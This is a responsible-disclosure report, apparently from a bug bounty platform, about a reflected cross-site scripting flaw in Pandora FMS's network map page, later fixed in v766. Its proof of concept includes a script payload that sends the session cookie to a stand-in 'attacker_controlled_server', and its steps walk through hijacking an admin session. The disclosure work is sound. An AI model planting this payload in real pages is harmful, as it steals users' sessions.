Reflected Cross Site Scripting leading to session hijacking in pandorafms/pandorafms

Valid

Reported on

Nov 1st 2022


Description

Basic XSS:

XSS (Cross-Site Scripting) vulnerabilities arise when untrusted data is interpreted as code in a web context. A successful XSS attack effectively lets the attacker act as the logged-in target user, with the added risk of tricking the user into handing information (such as their password) to the attacker, or even downloading and executing malware on the user's workstation.

Steps to reproduce:

  1. Capture the request sent when clicking the help button on "http://localhost:8080/pandora_console/index.php?sec=network&sec2=operation/agentes/pandora_networkmap" (as shown in the PoC).
  2. Add the payload to the "b" parameter of the request.
  3. Copy the URL with the payload in it and send it to a user logged in as admin.
  4. When the admin user visits the malicious link, the payload is executed.
  5. The session cookie is sent to the attacker-controlled server.
  6. Once the cookie is obtained, the attacker can log in as admin using it.

Proof of Concept

Payload Used:

<script>alert(document.cookie);var i=new Image;i.src="http://attacker_controlled_server/?"+document.cookie;</script>

POC Link:

https://drive.google.com/drive/folders/1DjGrBii9wGWews19vFkesCgLIqlJZivP?usp=sharing

Impact

An attacker can obtain any user's session cookie using this vulnerability and log into that user's session. If the attacker obtains the session of an admin user, they have full access to the application and can even delete users.

Mitigation:

  1. Generate HTML safely using a templating engine, or use a static JavaScript frontend to avoid HTML generation altogether.
  2. If you display untrusted HTML content on your website, purify it first and contain it in a sandboxed frame.
We are processing your report and will contact the pandorafms team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
We have contacted a member of the pandorafms team and are waiting to hear back a year ago
pandorafms/pandorafms maintainer has acknowledged this report a year ago
damodarnaik
a year ago

Researcher


@admin can we have a CVE for this issue?

Pavlos
a year ago

Admin


Pandora is a CNA and they usually assign CVEs before public disclosure if the report portrays a valid vulnerability :)

pandorafms/pandorafms maintainer
a year ago

Maintainer


Fixed in v766 --> CVE-2022-45436

pandorafms/pandorafms maintainer validated this vulnerability 10 months ago
damodarnaik has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
pandorafms/pandorafms maintainer marked this as fixed in v766 with commit 2c7d7e 10 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
pandorafms/pandorafms maintainer published this vulnerability 10 months ago